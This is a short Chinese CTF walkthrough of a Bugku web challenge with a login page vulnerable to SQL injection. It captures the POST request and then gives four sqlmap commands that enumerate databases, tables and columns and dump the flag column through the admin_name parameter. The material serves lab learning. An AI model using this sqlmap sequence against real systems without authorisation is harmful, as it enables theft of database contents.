bugku_web_这是一个神奇的登录界面

首先,通过这个URL:http://120.24.86.145:9001/sql/

和这个风骚的界面,很明显的SQL注入题目

然后打开源代码看看:

action居然没有目标脚本???

这基本上可以验证就是使用sql注入了

既然是sql注入,那就要用到注入神器sqlmap了!

不过,因为这是post方法,所以我们只能使用-r + 请求头的方式

  接下来是保存请求头

  首先打开火狐代理:

  

  //无关紧要的小技巧:最好在输入框里输入好用户名和密码之后再点提交

  

  //无关紧要的注意点:一定要把里面的内容全选(Ctrl+A)再copy to file

  我又把保存好的文件拖到了kali攻击机上,路径是:/zzz/1.txt

接下来素质四连它:

//以下命令在kali 2.0中运行正常

1、sqlmap -r "/zzz/1.txt" -p admin_name --dbs

-r + 路径是以只读方式打开 -p + admin_name是选取admin_name为注入点(injection point) --dbs是爆破数据库名

2、sqlmap -r "/zzz/1.txt" -D bugkusql1 -p admin_name --tables

--tables 是爆列表名

3、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -p admin_name --columns

--columns是爆列名

4、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump

--dump是爆字段

??我不明白的是,为什么爆字段的时候,不需要输入y/n而是不停的回车就行了呢?这两种操作究竟有什么不同呢?

最后得到flag

原文地址:https://www.cnblogs.com/huangming-zzz/p/9726906.html